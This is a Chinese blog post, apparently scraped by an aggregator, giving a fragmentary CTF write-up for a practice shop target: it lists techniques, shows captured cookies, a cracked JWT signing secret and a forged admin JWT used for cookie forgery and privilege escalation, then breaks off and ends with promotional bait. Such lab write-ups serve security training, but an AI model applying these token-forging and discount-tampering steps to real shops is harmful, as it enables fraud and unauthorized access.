薅羊毛浴火重生之手把手教你获取B站的...

Posted 李志宽

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了薅羊毛浴火重生之手把手教你获取B站的...相关的知识,希望对你有一定的参考价值。

解题步骤

知识点

解题思路

靶场地址:

 

知识点

  • Python脚本
  • Python爬虫
  • 支付逻辑漏洞
  • 垂直越权
  • Cookie伪造
  • JWT&&自研工具破解JWT
  • 代码审计
  • Python反序列化漏洞
  • 二维码修复
  • 与佛论禅

解题思路

  • 看网页源码

通过看拿到hint
通过点,购买,发现必须得登录,所以我们先进行注册  

注册完登录,出现如下个人信息 

分析得出,红框内容最重要
通过第一步得到hint,我们现在要做的第一步找到lv6
t通过分析得到lv6一定叫lv6.png
通过脚本达到
 lv6181
通过分析得到,我可以跟这修改折扣
然后我们尝试修改了discount ,发现出现如下界面 
Cookie: _xsrf=2|bbfd1e0f|6ab0628042ef365bb0d4eaa5455ea45b|1624307108; 

JWT=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ilx1NGUwZFx1NGU3MFx1ZmYwY1x1N
 
WMzMVx1NjYyZlx1NzNhOSJ9.ICg182g1edmklxrvH3apNpdLIkOpISgGfa8sUR8JHS4; 

commodity_id="2|1:0|10:1624308920|12:commodity_id|8:MTYyNA==|ce0c62100451d3d27f8145dc5 

cedf37f9dd1214a8c5be581b35898182e4d684b"
通过超哥写的自研工具进行JWT破解 
INFO:[*]: GET IT! JWT Signature Secret: 1Kun
再次通过自研工具进行加密
得到结果 
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-

wM1ZSwax3ivRK4j54jlaXv-1JjQynjo
_xsrf=2|87485681|269be5f7caed7fd7c6fda26ffe605261|1624653584; 

JWT=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1pY2hlYWwifQ.QEF0pCrYL3l4yP 

d_aci3voOfQrBMEOncKWnR1WnRdtU; 

commodity_id="2|1:0|10:1624654252|12:commodity_id|8:MTYyNA==|2ba87c5a5ff25994ad70e51c8

4838d58000effd4e2efe6806235c053954ff2b1
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1pY2hlYWwifQ.QEF0pCrYL3l4yPd_ac 

i3voOfQrBMEOncKWnR1WnRdtU
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1pY2hlYWwifQ.QEF0pCrYL3l4yPd_ac 

i3voOfQrBMEOncKWnR1WnRdtU

自研工具的值

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-

wM1ZSwax3ivRK4j54jlaXv-1JjQynjo 

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyYW5tZSI6ImFkbWluIn0.7bBE5RSUVrQtzc0LZhHZB
 
utYAXo-DwBlbtVaWfETElI

JWT.IO生产的值

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-

wM1ZSwax3ivRK4j54jlaXv-1JjQynjo 

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyYW5tZSI6ImFkbWluIn0.7bBE5RSUVrQtzc0LZhHZB

utYAXo-DwBlbtVaWfETElI

burp 抓包修改jwt

现在我们就进行了cookie伪造,进行垂直越权
然后审查源码发

靶场地址:

http://121.40.114.23:8083/shop

看到这里的大佬,动动发财的小手 点赞 + 回复 + 收藏,能【 关注 】一波就更好了

我是一名渗透测试工程师,为了感谢读者们,我想把我收藏的一些CTF夺旗赛干货贡献给大家,回馈每一个读者,希望能帮到你们。

干货主要有:

①1000+CTF历届题库(主流和经典的应该都有了)

②CTF技术文档(最全中文版)

③项目源码(四五十个有趣且经典的练手项目及源码)

CTF大赛、web安全、渗透测试方面的视频(适合小白学习)

⑤ 网络安全学习路线图(告别不入流的学习)

⑥ CTF/渗透测试工具镜像文件大全

⑦ 2021密码学/隐身术/PWN技术手册大全

各位朋友们可以关注+评论一波 然后点击下方   即可免费获取全部资料

→【资料获取】←

以上是关于薅羊毛浴火重生之手把手教你获取B站的...的主要内容,如果未能解决你的问题,请参考以下文章

大佬们的书单|速来薅羊毛了!

老款MacBook浴火重生记

IOS+安卓 | 薅羊毛了!!薅羊毛了!!

Android Studio应用基础,手把手教你从入门到精通(小白学习)总结1 之 基础介绍 + intent + 常用控件

三万字《算法零基础入门》跟着我做完这 50 件事,相信定会脱胎换骨,浴火重生 (建议收藏)

浴火重生--李开复